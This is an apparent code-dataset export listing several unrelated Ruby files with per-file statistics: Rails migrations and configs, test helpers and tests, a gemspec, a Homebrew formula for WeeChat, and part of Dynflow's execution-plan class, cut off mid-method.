hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e8b427f570eba599dadb0f959b5927b0fce0499c | 511 | class AddHomeTimeZoneToEventGroups < ActiveRecord::Migration[5.2]
# Adds event_groups.home_time_zone and backfills it from one of the group's
# events. The subquery has no ORDER BY, so when a group's events disagree,
# the chosen value is database-dependent (an arbitrary event wins).
def up
add_column :event_groups, :home_time_zone, :string
execute <<-SQL.squish
UPDATE event_groups
SET home_time_zone = (SELECT events.home_time_zone
FROM events
WHERE events.event_group_id = event_groups.id
LIMIT 1)
SQL
end
# Reverses the migration by dropping the backfilled column.
def down
remove_column :event_groups, :home_time_zone, :string
end
end
| 28.388889 | 79 | 0.585127 |
ed21023cd8a6c252ee913a0f9f2feaf03c3e7d35 | 4,438 | # Copyright (c) 2015 AppNeta, Inc.
# All rights reserved.
require 'rubygems'
require 'bundler/setup'
require "minitest/spec"
require "minitest/autorun"
require "minitest/reporters"
require "minitest/debugger" if ENV['DEBUG']
require "sinatra"
ENV["RACK_ENV"] = "test"
ENV["TRACEVIEW_GEM_TEST"] = "true"
ENV["TRACEVIEW_GEM_VERBOSE"] = "true"
# FIXME: Temp hack to fix padrino-core calling RUBY_ENGINE when it's
# not defined under Ruby 1.8.7 and 1.9.3
RUBY_ENGINE = "ruby" unless defined?(RUBY_ENGINE)
# NOTE(review): this builds a Minitest::Spec instance named 'pry' and
# discards it — possibly a leftover for `require 'pry'`; confirm intent.
Minitest::Spec.new 'pry'
unless RUBY_VERSION =~ /^1.8/
MiniTest::Reporters.use! MiniTest::Reporters::SpecReporter.new
end
if defined?(JRUBY_VERSION)
ENV['JAVA_OPTS'] = "-J-javaagent:/usr/local/tracelytics/tracelyticsagent.jar"
end
# Location the reporter writes trace events to; read back by get_all_traces.
@trace_dir = "/tmp/"
$trace_file = @trace_dir + "trace_output.bson"
Bundler.require(:default, :test)
# Configure TraceView
TraceView::Config[:verbose] = true
TraceView::Config[:tracing_mode] = "always"
TraceView::Config[:sample_rate] = 1000000
TraceView.logger.level = Logger::DEBUG
# Pre-create test databases (see also .travis.yml)
# puts "Pre-creating test databases"
# puts %x{mysql -u root -e 'create database travis_ci_test;'}
# puts %x{psql -c 'create database travis_ci_test;' -U postgres}
# Our background Rack-app for http client testing
require "./test/servers/rackapp_8101"
# Conditionally load other background servers
# depending on what we're testing
#
case File.basename(ENV['BUNDLE_GEMFILE'])
when /rails4/
require "./test/servers/rails4x_8140"
when /rails3/
require "./test/servers/rails3x_8140"
when /frameworks/
when /libraries/
end
##
# clear_all_traces
#
# Truncates the trace output file to zero
#
# Truncates the trace output file to zero bytes. Does nothing when
# TraceView has not been loaded.
def clear_all_traces
  TraceView::Reporter.clear_all_traces if TraceView.loaded
end
##
# get_all_traces
#
# Retrieves all traces written to the trace file
#
# Returns every trace written to the trace file, or an empty array when
# TraceView is not loaded.
def get_all_traces
  return [] unless TraceView.loaded

  TraceView::Reporter.get_all_traces
end
##
# validate_outer_layers
#
# Validates that the KVs in kvs are present
# in event
#
# Asserts that the first and last events of +traces+ are the entry and
# exit events of +layer+.
def validate_outer_layers(traces, layer)
  entry_event = traces.first
  exit_event = traces.last
  entry_event['Layer'].must_equal layer
  entry_event['Label'].must_equal 'entry'
  exit_event['Layer'].must_equal layer
  exit_event['Label'].must_equal 'exit'
end
##
# validate_event_keys
#
# Validates that the KVs in kvs are present
# in event
#
# Asserts that every key/value pair in +kvs+ is present (with the same
# value) in +event+.
def validate_event_keys(event, kvs)
  kvs.each do |key, expected|
    event.has_key?(key).must_equal true
    event[key].must_equal expected
  end
end
##
# has_edge?
#
# Searches the array of <tt>traces</tt> for
# <tt>edge</tt>
#
# True when some trace in +traces+ carries the edge id +edge+; logs a
# debug message when the edge is absent.
def has_edge?(edge, traces)
  found = traces.any? { |t| TraceView::XTrace.edge_id(t["X-Trace"]) == edge }
  TraceView.logger.debug "[oboe/debug] edge #{edge} not found in traces." unless found
  found
end
##
# valid_edges?
#
# Runs through the array of <tt>traces</tt> to validate
# that all edges connect.
#
# Note that this won't work for external cross-app tracing
# since we won't have those remote traces to validate
# against.
#
# True when every Edge referenced by a trace can be found among the
# traces themselves.
def valid_edges?(traces)
  traces.reverse_each do |trace|
    next unless trace.key?("Edge")
    return false unless has_edge?(trace["Edge"], traces)
  end
  true
end
##
# layer_has_key
#
# Checks an array of trace events if a specific layer (regardless of event type)
# has the specified key
#
# Asserts that at least one event of +layer+ (any event type) carries
# +key+; every matching event must also carry a non-empty Backtrace.
# Returns false immediately for an empty trace set.
def layer_has_key(traces, layer, key)
  return false if traces.empty?

  found = false
  traces.each do |trace|
    next unless trace["Layer"] == layer && trace.has_key?(key)
    found = true
    (trace["Backtrace"].length > 0).must_equal true
  end
  found.must_equal true
end
##
# layer_doesnt_have_key
#
# Checks an array of trace events to assure that a specific layer
# (regardless of event type) doesn't have the specified key
#
# Asserts that no event of +layer+ (any event type) carries +key+.
# Returns false immediately for an empty trace set.
def layer_doesnt_have_key(traces, layer, key)
  return false if traces.empty?

  offending = traces.any? { |t| t["Layer"] == layer && t.has_key?(key) }
  offending.must_equal false
end
##
# Sinatra and Padrino Related Helpers
#
# Taken from padrino-core gem
#
# Reopen Sinatra::Base so Minitest assertions can be called from inside
# request-handling code during tests (pattern taken from padrino-core).
class Sinatra::Base
# Allow assertions in request context
include MiniTest::Assertions
end
# Reopen MiniTest::Spec to add Rack::Test helpers for Sinatra/Padrino specs.
class MiniTest::Spec
include Rack::Test::Methods
# Sets up a Sinatra::Base subclass defined with the block
# given. Used in setup or individual spec methods to establish
# the application.
def mock_app(base=Padrino::Application, &block)
@app = Sinatra.new(base, &block)
end
# App under test, wrapped in Rack::Lint to surface Rack spec violations.
def app
Rack::Lint.new(@app)
end
end
| 21.033175 | 80 | 0.719243 |
1104cda77ffc1281e4943374082f88ca24d11e22 | 5,638 | module BaseDelayedPaperclipTest
# Re-enable processing-aware URLs and rebuild the Dummy model before each
# test; individual tests override these settings via reset_dummy.
def setup
super
DelayedPaperclip.options[:url_with_processing] = true
reset_dummy
end
def test_normal_paperclip_functioning
reset_dummy :with_processed => false
Paperclip::Attachment.any_instance.expects(:post_process)
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
assert !dummy.image.delay_processing?
assert dummy.image.post_processing
assert dummy.save
assert File.exist?(dummy.image.path)
end
def test_normal_explisit_post_processing_with_delayed_paperclip
reset_dummy :with_processed => true
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
dummy.image.post_processing = true
assert !dummy.image.delay_processing?
assert dummy.image.post_processing, "Post processing should return true"
assert dummy.save
assert File.exist?(dummy.image.path)
end
def test_delayed_paperclip_functioning
build_dummy_table(false)
reset_class "Dummy", :with_processed => true
Paperclip::Attachment.any_instance.expects(:post_process).never
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
assert dummy.image.delay_processing?
assert !dummy.image.post_processing
assert dummy.save
assert File.exist?(dummy.image.path), "Path #{dummy.image.path} should exist"
end
# Saving a record whose attachment source changed must enqueue exactly
# one background job.
# NOTE(review): the first fixture path uses ROOT while the second uses
# RAILS_ROOT — presumably both constants resolve to the project root in
# this test suite; confirm.
def test_enqueue_job_if_source_changed
dummy = Dummy.new(:image => File.open("#{ROOT}/test/fixtures/12k.png"))
dummy.image = File.open("#{RAILS_ROOT}/test/fixtures/12k.png")
original_job_count = jobs_count
dummy.save
assert_equal original_job_count + 1, jobs_count
end
# When the background job raises, the image_processing flag must remain
# true both in memory and after a reload, so the failure stays visible.
def test_processing_column_kept_intact
Paperclip::Attachment.any_instance.stubs(:reprocess!).raises(StandardError.new('oops'))
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert dummy.image_processing?
process_jobs rescue nil # some adapters raise, some don't
assert dummy.image_processing?
assert dummy.reload.image_processing?
end
def test_processing_true_when_new_image_added
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
assert !dummy.image_processing?
assert dummy.new_record?
dummy.save!
assert dummy.reload.image_processing?
end
def test_processed_true_when_delayed_jobs_completed
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
process_jobs
dummy.reload
assert !dummy.image_processing?, "Image should no longer be processing"
end
def test_unprocessed_image_returns_missing_url
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_equal "/images/original/missing.png", dummy.image.url(:original, :timestamp => false)
process_jobs
dummy.reload
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
end
def test_unprocessed_image_not_returning_missing_url_if_turrned_of_globally
DelayedPaperclip.options[:url_with_processing] = false
reset_dummy :with_processed => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match %r{/system/images/1/original/12k.png}, dummy.image.url
process_jobs
dummy.reload
assert_match %r{/system/images/1/original/12k.png}, dummy.image.url
end
def test_unprocessed_image_not_returning_missing_url_if_turrned_of_on_instance
reset_dummy :with_processed => false, :url_with_processing => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
process_jobs
dummy.reload
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
end
def test_original_url_when_no_processing_column
reset_dummy :with_processed => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match(%r{/system/images/1/original/12k.png}, dummy.image.url)
end
def test_original_url_if_image_changed
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
dummy.image = File.open("#{RAILS_ROOT}/test/fixtures/12k.png")
dummy.save!
assert_equal '/images/original/missing.png', dummy.image.url(:original, :timestamp => false)
process_jobs
assert_match(%r{system/images/.*original.*}, dummy.reload.image.url)
end
def test_missing_url_if_image_hasnt_changed
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
assert_match(%r{images/.*missing.*}, dummy.image.url)
end
def test_should_not_blow_up_if_dsl_unused
reset_dummy :with_processed => false
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
assert dummy.image.url
end
def test_after_callback_is_functional
Dummy.send(:define_method, :done_processing) { puts 'done' }
Dummy.after_image_post_process :done_processing
Dummy.any_instance.expects(:done_processing)
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
process_jobs
end
def test_delayed_paperclip_functioning_with_after_update_callback
reset_class "Dummy", :with_processed => true, :with_after_update_callback => true
Dummy.any_instance.expects(:reprocess)
dummy = Dummy.new(:image => File.open("#{RAILS_ROOT}/test/fixtures/12k.png"))
dummy.save!
process_jobs
dummy.update!(name: "hi")
end
end
| 37.337748 | 96 | 0.734126 |
39ef817d5d278cb4afcd6704e689dcf987dedf3e | 974 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'll/wk/api/version'
Gem::Specification.new do |spec|
spec.name = 'll_wk_api'
spec.version = LL::WK::API::VERSION
spec.authors = ['Matt Mofrad']
spec.email = ['[email protected]']
spec.summary = 'Gem for interacting with livelink webkiosks'
spec.homepage = 'https://github.com/Zibby/wk_api_gem'
spec.license = 'MIT'
# Package only git-tracked files, excluding test/spec/feature trees.
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.16'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
# Runtime dependencies used for HTTP access to the webkiosk API.
spec.add_dependency 'curb'
spec.add_dependency 'httparty'
end
| 34.785714 | 74 | 0.645791 |
28ed07e79990fbfeb14508e724d1e30599a0b99f | 169 | module Quickbooks
module Model
# Generic name/value pair as serialized in QuickBooks XML payloads
# (maps the <Name> and <Value> elements).
class NameValue < BaseModel
xml_accessor :name, :from => "Name"
xml_accessor :value, :from => "Value"
end
end
end
| 18.777778 | 43 | 0.64497 |
33fb5b2240e0e98ef579538d64696876d7bdde0a | 3,704 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like nginx, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable Rails's static asset server (Apache or nginx will already do this).
config.serve_static_assets = false
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Compress JavaScripts and CSS.
# Required for angular $scope variable and others. Refactor if you want to improve compression performance
config.assets.js_compressor = Sprockets::LazyCompressor.new { Uglifier.new(:mangle => false) }
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Generate digests for assets URLs.
config.assets.digest = true
# `config.assets.precompile` has moved to config/initializers/assets.rb
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Set to :debug to see everything in the log.
config.log_level = :info
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# config.assets.precompile += %w( search.js )
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Disable automatic flushing of the log to improve performance.
# config.autoflush_log = false
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Enable subdomains two deep, as in app.clicker.dev
config.action_dispatch.tld_length = 2
end
| 41.617978 | 108 | 0.734071 |
18f85165d39b773371664ed14cdd35716a231c5a | 243 | class CreateArtists < ActiveRecord::Migration
# Creates the artists table with Spotify metadata columns.
# NOTE(review): Spotify ids are alphanumeric strings, so an integer
# :spotify_id column looks suspicious — confirm against the API client.
def change
create_table :artists do |t|
t.string :name
t.integer :spotify_id
t.integer :spotify_popularity
t.string :spotify_url
t.timestamps
end
end
end
| 18.692308 | 45 | 0.670782 |
ed6ad8fe77e4d8a11e274be9e4f6cbdece08905a | 1,777 | require 'uri'
module Yoda
class Server
# Denotes workspace folder in LSP.
# @see: https://microsoft.github.io/language-server-protocol/specifications/specification-current/#workspace_workspaceFolders
class Workspace
# @return [FileStore]
attr_reader :file_store
# @return [String]
attr_reader :name
# @return [String]
attr_reader :root_uri
# @param folder [LanguageServer::Protocol::Interface::WorkspaceFolder]
# @return [Workspace]
def self.from_workspace_folder(folder)
new(name: folder.name, root_uri: folder.uri)
end
# @param name [String]
# @param root_uri [String]
# @param name [String] human-readable workspace name
# @param root_uri [String] URI of the workspace root folder
def initialize(name:, root_uri:)
@name = name
@root_uri = root_uri
@file_store = FileStore.new
end
# @return [Array<Exception>] errors on setup
def setup
project.setup
end
# @return [Store::Project, nil]
def project
@project ||= Store::Project.new(name: name, root_path: root_path)
end
def root_path
FileStore.path_of_uri(root_uri)
end
# @param path [String]
def uri_of_path(path)
FileStore.uri_of_path(File.expand_path(path, root_path))
end
# Loads the document at +uri+ into the file store and the project.
# Returns nil without loading anything when the uri resolves to a path
# outside this workspace.
def read_source(uri)
path = FileStore.path_of_uri(uri)
return unless subpath?(path)
file_store.load(uri)
project.read_source(path)
end
# @param uri [String]
# @param source [String]
def store_source(uri:, source:)
file_store.store(uri, source)
end
# True when +uri+ resolves to a path inside this workspace.
def suburi?(uri)
  subpath?(FileStore.path_of_uri(uri))
end
# True when +path+ lies below the workspace root.
# NOTE(review): File.fnmatch is called without File::FNM_PATHNAME, so '*'
# also matches '/' here, and the root path itself does not match — confirm
# both behaviors are intended.
def subpath?(path)
File.fnmatch("#{root_path}/**/*", path)
end
end
end
end
| 24.013514 | 129 | 0.609454 |
bb021148faa37a25867bf606dd9ee37e39f0aaf0 | 264 | module OpenActive
module Models
module Schema
# JSON-LD model for the schema.org MedicalProcedureType type.
class MedicalProcedureType < ::OpenActive::JsonLdModel
# @!attribute type
# @return [String]
def type
"schema:MedicalProcedureType"
end
end
end
end
end
| 18.857143 | 60 | 0.602273 |
267cc33955dcf513facdbd3271aec48b350e60c6 | 239 | class CreateTasks < ActiveRecord::Migration[6.0]
# Creates the tasks table: each task references a user and a project and
# carries a due date plus a free-text description.
def change
create_table :tasks do |t|
t.datetime :due_date
t.string :description
t.integer :user_id
t.integer :project_id
t.timestamps
end
end
end
| 18.384615 | 48 | 0.65272 |
e2dc000f88e1cecad4109d46c5497ef857d6538c | 285 | FactoryBot.define do
# Define your Spree extensions Factories within this file to enable applications, and other extensions to use and override them.
#
# Example adding this to your spec_helper will load these Factories for use:
# require 'spree_refer_by_qrcode/factories'
end
| 40.714286 | 130 | 0.792982 |
bf23ebcee81b6a61f13dea149e5bfe86b6bd18bf | 66 | class Command < ActiveRecord::Base
belongs_to :device_group
end
| 16.5 | 34 | 0.80303 |
1cb0dfaedc39426c1be25f20a86994399ac5934d | 1,412 | class Weechat < Formula
desc "Extensible IRC client"
homepage "https://www.weechat.org"
url "https://weechat.org/files/src/weechat-2.7.tar.xz"
sha256 "56fc42a4afece57bc27f95a2d155815a5e6472f32535add4c0ab4ce3b5e399e7"
head "https://github.com/weechat/weechat.git"
bottle do
sha256 "6b1633f4e5f572c6358094ce4d14f40accb43cf4b827bff90cd919724eb1435c" => :catalina
sha256 "d7ff08c8ed104c89b7463d1cbf6740fd15def9991355855bbe20fd51838b9332" => :mojave
sha256 "69b7afc70b76386a35e6a63978a8c44f515fdabd19b1b1a3027162ede7a24a99" => :high_sierra
end
depends_on "asciidoctor" => :build
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "aspell"
depends_on "gettext"
depends_on "gnutls"
depends_on "libgcrypt"
depends_on "libiconv"
depends_on "lua"
depends_on "ncurses"
depends_on "perl"
depends_on "python"
depends_on "ruby"
# Configures and builds weechat via CMake, disabling the guile/js/php
# plugins and pointing gnutls at Homebrew's CA bundle.
def install
args = std_cmake_args + %W[
-DENABLE_MAN=ON
-DENABLE_GUILE=OFF
-DCA_FILE=#{etc}/openssl/cert.pem
-DENABLE_JAVASCRIPT=OFF
-DENABLE_PHP=OFF
]
# Mojave CLT-only installs need SDKROOT pointed at the CLT SDK so system
# headers resolve during the build.
if MacOS.version >= :mojave && MacOS::CLT.installed?
ENV["SDKROOT"] = ENV["HOMEBREW_SDKROOT"] = MacOS::CLT.sdk_path(MacOS.version)
end
mkdir "build" do
system "cmake", "..", *args
system "make", "install", "VERBOSE=1"
end
end
# Smoke test: launch the built weechat and immediately quit.
test do
system "#{bin}/weechat", "-r", "/quit"
end
end
| 27.686275 | 93 | 0.704674 |
79dec442818be6f4be60d91f36ee52aa7f03de27 | 495 | require 'spec_helper'
# A project member can leave via the project page and is redirected to
# the dashboard with the membership removed.
feature 'Projects > Members > Member leaves project', feature: true do
let(:user) { create(:user) }
let(:project) { create(:project) }
background do
project.team << [user, :developer]
login_as(user)
visit namespace_project_path(project.namespace, project)
end
scenario 'user leaves project' do
click_link 'Leave Project'
expect(current_path).to eq(dashboard_projects_path)
expect(project.users.exists?(user.id)).to be_falsey
end
end
| 24.75 | 70 | 0.715152 |
7932b78441ee2b927902bf5697f0d54589226955 | 490 | class Micropost < ApplicationRecord
belongs_to :user
# Newest microposts first.
default_scope -> { order(created_at: :desc) }
mount_uploader :picture, PictureUploader
validates :user_id, presence: true
validates :content, presence: true,
length: { maximum: 140 }
validate :picture_size
private
# Custom validation: rejects uploaded pictures larger than 5 megabytes.
def picture_size
  errors.add(:picture, "should be less than 5MB") if picture.size > 5.megabytes
end
end
| 25.789474 | 55 | 0.671429 |
ede01fafcaf9273e4cc5a156b82a3ec235e9416d | 4,310 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "sample_app_#{Rails.env}"
config.action_mailer.perform_caching = false
config.action_mailer.raise_delivery_errors = true
config.action_mailer.delivery_method = :smtp
host = 'morning-beach-58479.herokuapp.com'
config.action_mailer.default_url_options = { host: host }
ActionMailer::Base.smtp_settings = {
:address => 'smtp.sendgrid.net',
:port => '587',
:authentication => :plain,
:user_name => ENV['SENDGRID_USERNAME'],
:password => ENV['SENDGRID_PASSWORD'],
:domain => 'heroku.com',
:enable_starttls_auto => true
}
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 40.660377 | 102 | 0.742923 |
28a5c878d4d38a7454cd5063f08e17cca4762989 | 18,101 | require 'securerandom'
module Dynflow
# rubocop:disable Metrics/ClassLength
# TODO extract planning logic to an extra class ExecutionPlanner
class ExecutionPlan < Serializable
# a fallback object representing a plan with some corrupted data,
# preventing to load the whole plan properly, this can be used for presenting
# at least some data and not running into internal server errors
class InvalidPlan
attr_reader :exception, :id, :label, :state,
:started_at, :ended_at,
:execution_time, :real_time, :execution_history
# @param exception [Exception] the error hit while loading the real plan
# The remaining arguments mirror ExecutionPlan's attributes; absent
# values fall back to presentable defaults ('N/A' label, empty history).
def initialize(exception, id, label, state,
started_at = nil, ended_at = nil,
execution_time = nil, real_time = nil, execution_history = nil)
@exception = exception
@id = id
@label = label || 'N/A'
@state = state
@started_at = started_at
@ended_at = ended_at
@execution_time = execution_time
@real_time = real_time
@execution_history = execution_history || []
end
# Marks this object as a degraded stand-in (cf. ExecutionPlan#valid?).
def valid?
false
end
# No meaningful result can be computed for a corrupted plan.
def result
'N/A'
end
end
include Algebrick::TypeCheck
include Stateful
require 'dynflow/execution_plan/steps'
require 'dynflow/execution_plan/output_reference'
require 'dynflow/execution_plan/dependency_graph'
attr_reader :id, :world, :label,
:root_plan_step, :steps, :run_flow, :finalize_flow,
:started_at, :ended_at, :execution_time, :real_time, :execution_history
# All states an execution plan can pass through.
def self.states
@states ||= [:pending, :scheduled, :planning, :planned, :running, :paused, :stopped]
end
require 'dynflow/execution_plan/hooks'
# Possible overall results, derived from step states in #result.
def self.results
@results ||= [:pending, :success, :warning, :error, :cancelled]
end
# Map of state => states directly reachable from it.
def self.state_transitions
@state_transitions ||= { pending: [:stopped, :scheduled, :planning],
scheduled: [:planning, :stopped],
planning: [:planned, :stopped],
planned: [:running, :stopped],
running: [:paused, :stopped],
paused: [:running, :stopped],
stopped: [] }
end
# all params with default values are part of *private* api
# all params with default values are part of *private* api
# Every argument is type-checked via Algebrick's Type!; steps is a hash
# of step id (Integer) => Steps::Abstract.
def initialize(world,
id = SecureRandom.uuid,
label = nil,
state = :pending,
root_plan_step = nil,
run_flow = Flows::Concurrence.new([]),
finalize_flow = Flows::Sequence.new([]),
steps = {},
started_at = nil,
ended_at = nil,
execution_time = nil,
real_time = 0.0,
execution_history = ExecutionHistory.new)
@id = Type! id, String
@world = Type! world, World
@label = Type! label, String, NilClass
self.state = state
@run_flow = Type! run_flow, Flows::Abstract
@finalize_flow = Type! finalize_flow, Flows::Abstract
@root_plan_step = root_plan_step
@started_at = Type! started_at, Time, NilClass
@ended_at = Type! ended_at, Time, NilClass
@execution_time = Type! execution_time, Numeric, NilClass
@real_time = Type! real_time, Numeric
@execution_history = Type! execution_history, ExecutionHistory
steps.all? do |k, v|
Type! k, Integer
Type! v, Steps::Abstract
end
@steps = steps
end
# Successfully loaded plans are always valid (cf. InvalidPlan#valid?).
def valid?
true
end
# Delegates logging to the owning world's logger.
def logger
@world.logger
end
# Transitions the plan to +state+, maintains the timing bookkeeping,
# persists the plan and fires the execution-plan hooks for the new state.
def update_state(state)
hooks_to_run = [state]
original = self.state
case self.state = state
when :planning
@started_at = Time.now
when :stopped
@ended_at = Time.now
@real_time = @ended_at - @started_at unless @started_at.nil?
@execution_time = compute_execution_time
# a finished plan additionally fires either :failure or :success
hooks_to_run << (failure? ? :failure : :success)
unlock_all_singleton_locks!
when :paused
unlock_all_singleton_locks!
else
# ignore
end
logger.debug format('%13s %s %9s >> %9s',
'ExecutionPlan', id, original, state)
self.save
hooks_to_run.each { |kind| run_hooks kind }
end
# Runs all execution-plan hooks registered for +state+ on this plan's
# actions. Only :id and :class are loaded up front so that actions with
# no hook for this state are never fully instantiated.
def run_hooks(state)
records = persistence.load_actions_attributes(@id, [:id, :class]).select do |action|
Utils.constantize(action[:class])
.execution_plan_hooks
.on(state).any?
end
action_ids = records.compact.map { |record| record[:id] }
return if action_ids.empty?
persistence.load_actions(self, action_ids).each do |action|
world.middleware.execute(:hook, action, self) do
action.class.execution_plan_hooks.run(self, action, state)
end
end
end
# Overall result derived from the step states, checked in priority order:
# cancelled > error > warning (skips) > success > pending. An empty step
# set yields :success (all? is vacuously true).
def result
  step_states = steps.values.map(&:state)
  if step_states.include?(:cancelled)
    :cancelled
  elsif step_states.include?(:error)
    :error
  elsif step_states.any? { |state| [:skipping, :skipped].include?(state) }
    :warning
  elsif step_states.all? { |state| state == :success }
    :success
  else
    :pending
  end
end
# True when the overall result is :error.
def error?
result == :error
end
# True for any non-success result (error, warning or cancelled).
def failure?
[:error, :warning, :cancelled].include?(result)
end
# True when a failure occurred during the plan phase itself.
def error_in_plan?
steps_in_state(:error).any? { |step| step.is_a? Steps::PlanStep }
end
# All step errors, nils removed.
def errors
steps.values.map(&:error).compact
end
# Rescue strategy of the entry action, defaulting to Action::Rescue::Skip.
def rescue_strategy
rescue_strategy = entry_action.rescue_strategy || Action::Rescue::Skip
Type! rescue_strategy, Action::Rescue::Strategy
end
# Execution plans triggered by this one.
def sub_plans
persistence.find_execution_plans(filters: { 'caller_execution_plan_id' => self.id })
end
# Count of execution plans triggered by this one.
def sub_plans_count
